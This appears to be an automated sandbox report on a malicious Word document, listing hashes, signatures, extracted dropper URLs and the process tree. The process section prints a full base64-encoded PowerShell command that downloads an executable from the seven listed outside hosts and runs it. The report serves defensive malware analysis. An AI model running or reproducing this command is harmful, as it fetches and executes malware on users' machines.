Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 02:22

General

  • Target

    22ca33b551157c71584a2d538f0460b2_JaffaCakes118.doc

  • Size

    159KB

  • MD5

    22ca33b551157c71584a2d538f0460b2

  • SHA1

    ce43cb105d602af963df9f4732b405e82ce18c13

  • SHA256

    55db2844a6594af4aee89e777674a355aa76957546900c502d0bce44722c5a15

  • SHA512

    41e4fcb98b6b2d030bb12094cf0d61e0a2ac0c47b487396685c00069d6a620d97fd8b7879a2c1567e95127ee24c4a25a2f5f9f04ba63aa1cbfbf53709cc3c323

  • SSDEEP

    1536:kcLzncLzMrdi1Ir77zOH98Wj2gpngx+a9rLln2/5pe:9rfrzOH98ipgXL05pe

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://wynn838.com/wp-content/enE/

exe.dropper

https://sertres.com/ivmej/p/

exe.dropper

https://viaje-achina.com/wp-admin/aG/

exe.dropper

https://aszcasino.com/aszdemo/AGA/

exe.dropper

https://bintangremaja.com/wp-content/U/

exe.dropper

https://phongkhamthaiduongbienhoa.vn/wp-admin/Z/

exe.dropper

http://hk.olivellaline.com/gbi1e/2/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\22ca33b551157c71584a2d538f0460b2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABGAHoAcABuAGIAMwBrAD0AKAAnAEYAJwArACgAJwA2AG8AJwArACcAcQBvAGUAJwApACsAJwAzACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgB2ADoAVQBTAEUAcgBQAFIAbwBGAEkATABFAFwAVABwAHoANABTAFEAMQBcAFgAQwBJAGIAMwBnAHQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBDAFQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABlAEMAdQBgAFIAaQBUAHkAUABSAGAATwB0AE8AYwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADIALAAnACsAJwAgAHQAbABzADEAJwApACsAKAAnADEALAAgACcAKwAnAHQAbAAnACkAKwAnAHMAJwApADsAJABUAG0AZwB6AHkAZgBfACAAPQAgACgAJwBNACcAKwAoACcAbwB0ADYAJwArACcAMABuAGUAcgAnACsAJwBhACcAKQApADsAJABJAGwAMQBfAHAAdQA0AD0AKAAoACcATQAwADIAJwArACcAdwAyACcAKQArACcAXwAnACsAJwBlACcAKQA7ACQAWAAxAGIAaABuADkAYgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADYAJwArACcAbwBuAFQAJwApACsAKAAnAHAAegAnACsAJwA0ACcAKQArACcAcwAnACsAKAAnAHEAJwArACcAMQA2AG8AJwArACcAbgBYAGMAaQBiACcAKQArACcAMwBnACcAKwAnAHQAJwArACcANgAnACsAJwBvAG4AJwApAC4AIgByAGUAUABgAEwAQQBDAGUAIgAoACgAJwA2AG8AJwArACcAbgAnACkALABbAFMAVAByAGkAbgBHAF0AWwBDAEgAYQBSAF0AOQAyACkAKQArACQAVABtAGcAegB5AGYAXwArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAFAAeABiAGoAdgAzAGsAPQAoACgAJwBQACcAKwAnAG8AeAAnACkAKwAnAHoANwAnACsAJwA2AHUAJwApADsAJABNAG4AbQBtAGMAYwAwAD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAFcAZQBCAEMATABpAGUATgB0ADsAJABSAGoAYwBlADQAdgA0AD0AKAAnAGgAJwArACcAdAAnACsAJwB0AHAAJwArACcAOgAvACcAKwAoACcALwB3ACcAKwAnAHkAJwApACsAKAAnAG4AbgAnACsAJwA4ACcAKQArACgAJwAzADgALgAnACsAJwBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwArACcAbgB0AC8AJwApACsAKAAnAGUAbgAnACsAJwBFACcAKQArACcALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAcwAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AcwBlAHIAdAByACcAKwAnAGUAcwAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAKAAnAG0ALwAnACsAJwBpAHYAJwArACcAbQBlAGoALwBwAC8AKgBoACcAKwAnAHQAdAAnACkAKwAoACcAcABzADoALwAvACcAKwAnAHYAJwArACcAaQAnACkAKwAoACcAYQBqAGUAJwArACcALQBhACcAKQArACcAYwBoACcAKwAoACcAaQAnACsAJwBuAGEAJwApACsAKAAnAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwBwAC0AYQBkAG0AaQBuAC8AYQBHAC8AKgAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAnAHMAJwArACcAOgAnACsAJwAvACcAKwAnAC8AYQBzAHoAJwApACsAJwBjAGEAJwArACcAcwAnACsAJwBpACcAKwAoACcAbgBvAC4AYwBvACcAKwAnAG0ALwAnACsAJwBhACcAKQArACcAcwB6ACcAKwAnAGQAJwArACgAJwBlACcAKwAnAG0AbwAvACcAKQArACgAJwBBAEcAQQAnACsAJwAvACoAaAB0AHQAcAAnACkAKwAoACcAcwA6ACcAKwAnAC8ALwBiACcAKQArACgAJwBpACcAKwAnAG4AdABhACcAKQArACcAbgBnACcAKwAoACcAcgBlAG0AYQBqACcAKwAnAGEALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwB3ACcAKQArACgAJwBwAC0AYwBvAG4AJwArACcAdABlAG4AJwArACcAdAAnACkAKwAnAC8AJwArACgAJwBVAC8AJwArACcAKgBoACcAKQArACgAJwB0AHQAcABzADoAJwArACcALwAvACcAKQArACgAJwBwAGgAJwArACcAbwAnACkAKwAoACcAbgBnACcAKwAnAGsAJwApACsAJwBoACcAKwAoACcAYQBtACcAKwAnAHQAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBpAGQAdQBvACcAKwAnAG4AJwArACcAZwBiAGkAJwArACcAZQAnACsAJwBuACcAKwAnAGgAbwBhAC4AdgBuAC8AdwBwAC0AJwApACsAKAAnAGEAZAAnACsAJwBtAGkAbgAvACcAKwAnAFoALwAqAGgAJwApACsAKAAnAHQAdABwADoALwAvACcAKwAnAGgAawAuAG8AJwArACcAbAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAGUAJwArACcAbABsAGEAbABpAG4AZQAuAGMAbwBtACcAKQArACgAJwAvACcAKwAnAGcAYgAnACkAKwAnAGkAJwArACcAMQAnACsAKAAnAGUALwAnACsAJwAyAC8AJwApACkALgAiAFMAcABgAGwAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQASgAwAHEAXwBiAGgAcQA9ACgAJwBRAGIAJwArACcAeAA1ACcAKwAoACcAZAAnACsAJwA2AHkAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAHEAZwBsAGoAeABmACAAaQBuACAAJABSAGoAYwBlADQAdgA0ACkAewB0AHIAeQB7ACQATQBuAG0AbQBjAGMAMAAuACIAZABPAHcAbgBgAEwATwBgAEEARABGAGkAYABMAGUAIgAoACQAQQBxAGcAbABqAHgAZgAsACAAJABYADEAYgBoAG4AOQBiACkAOwAkAFMAYQAzAHMAcQAyAHMAPQAoACgAJwBBAGwAJwArACcAcAAnACkAKwAoACcAYgA5ACcAKwAnAGQAJwApACsAJwBxACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABYADEAYgBoAG4AOQBiACkALgAiAEwAYABlAG4AYABHAFQASAAiACAALQBnAGUAIAAzADIANwA0ADIAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUALQBJAHQAZQAnACsAJwBtACcAKQAoACQAWAAxAGIAaABuADkAYgApADsAJABWAGoANAB0AGUAOABuAD0AKAAnAEUAJwArACgAJwB3ACcAKwAnAHQAZgBxACcAKQArACcAbAAxACcAKQA7AGIAcgBlAGEAawA7ACQAQwAwADcAYwBjAHMAdwA9ACgAJwBZADAAJwArACcAMQAnACsAKAAnADQAbwAnACsAJwA4AHUAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAcABrAHcANwBhAHYAPQAoACcASwAnACsAKAAnAGsAJwArACcAagBmADAAbgB2ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2716

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fed97c7e360103ecf34472e746d4ef1e

      SHA1

      340c6f9bb7377aaf9842a876b94e88605d801a4c

      SHA256

      3fa6b9f5c63e746c314c50b40f79e2b1e5efd2c535e0243fd5a9c71339755206

      SHA512

      eb0d55dc4a9a6392ed3de30c3dda439aa3a189bb93860d0f878674f49429d14b34ab7f3a7215b0e56dc82a676c6eec775fd072e9a18987abbf9d791560cbf89e

    • memory/1700-12-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-0-0x000000002FBC1000-0x000000002FBC2000-memory.dmp

      Filesize

      4KB

    • memory/1700-6-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-7-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-11-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-8-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-9-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-10-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-21-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-22-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-18-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-19-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-17-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-16-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-15-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-14-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-2-0x0000000070D9D000-0x0000000070DA8000-memory.dmp

      Filesize

      44KB

    • memory/1700-13-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-23-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-25-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-24-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-31-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-29-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-32-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-30-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-27-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-26-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-33-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-65-0x0000000070D9D000-0x0000000070DA8000-memory.dmp

      Filesize

      44KB

    • memory/1700-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1700-46-0x0000000070D9D000-0x0000000070DA8000-memory.dmp

      Filesize

      44KB

    • memory/1700-47-0x0000000000820000-0x0000000000920000-memory.dmp

      Filesize

      1024KB

    • memory/1700-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2716-39-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

      Filesize

      2.9MB

    • memory/2716-40-0x0000000002810000-0x0000000002818000-memory.dmp

      Filesize

      32KB